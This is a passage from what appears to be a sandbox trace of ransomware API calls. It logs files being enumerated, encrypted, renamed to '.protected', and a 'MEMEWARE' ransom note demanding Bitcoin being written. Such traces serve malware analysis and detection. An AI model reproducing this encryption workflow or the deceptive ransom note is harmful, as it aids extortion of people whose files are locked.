returned 1 [0086.898] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.898] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.899] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.899] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.899] CloseHandle (hObject=0xd8) returned 1 [0086.899] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv.protected") returned 78 [0086.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\symnktprmbv.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\symnktprmbv.flv.protected")) returned 1 [0086.900] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Windows") returned -1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files") returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files (x86)") returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="$Recycle.bin") returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="System Volume Information") returned 1 [0086.901] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary 
Internet Files") returned 77 [0086.901] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0086.901] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0086.901] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\*") returned 79 [0086.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.901] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.901] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.901] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.901] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.901] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\.") returned 79 [0086.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.902] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.902] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.902] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.902] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.902] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.902] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.902] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.902] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.902] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.902] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\..") returned 80 [0086.902] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.902] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.902] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.902] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.902] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.902] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="Windows") returned -1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="Program Files") returned -1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="Program Files (x86)") returned -1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="$Recycle.bin") returned 1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="System Volume Information") returned -1 [0086.902] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5") returned 89 [0086.903] lstrcmpW (lpString1="Content.IE5", lpString2=".") returned 1 [0086.903] lstrcmpW (lpString1="Content.IE5", lpString2="..") returned 1 [0086.903] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\*") returned 91 [0086.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.903] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.903] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.903] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.903] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.903] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.903] wnsprintfW (in: 
pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\.") returned 91 [0086.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.903] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.903] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.903] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.903] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.903] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.903] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.904] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.904] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.904] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\..") returned 92 [0086.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.904] StrStrIW 
(lpFirst="..", lpSrch=".protected") returned 0x0 [0086.904] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.904] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.904] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.904] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="Windows") returned -1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="Program Files") returned -1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="Program Files (x86)") returned -1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="$Recycle.bin") returned 1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="System Volume Information") returned -1 [0086.904] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0") returned 98 [0086.904] lstrcmpW (lpString1="03J4UQW0", lpString2=".") returned 1 [0086.904] lstrcmpW (lpString1="03J4UQW0", lpString2="..") returned 1 [0086.905] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\*") returned 100 [0086.905] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.906] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.906] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.906] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.906] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.906] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.906] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\.") returned 100 [0086.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.906] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.906] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.906] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.906] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.906] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.906] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.906] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.906] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.906] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.906] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.907] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\..") returned 101 [0086.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.907] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.907] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.907] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.907] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.907] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.907] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.907] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.907] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.907] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.907] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 
[0086.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.908] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.908] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.908] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.908] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.909] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.909] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.909] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.909] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.909] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.909] CloseHandle 
(hObject=0x154) returned 1 [0086.910] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.protected") returned 120 [0086.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini.protected")) returned 1 [0086.910] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.910] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.911] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\RESTORE_FILES.txt") returned 116 [0086.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.911] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.911] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.912] lstrlenA (lpString="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") returned 684 [0086.912] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.912] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.912] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.912] CloseHandle (hObject=0x150) returned 1 [0086.912] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.913] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.913] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.913] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.913] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.914] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.914] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.914] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.914] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, 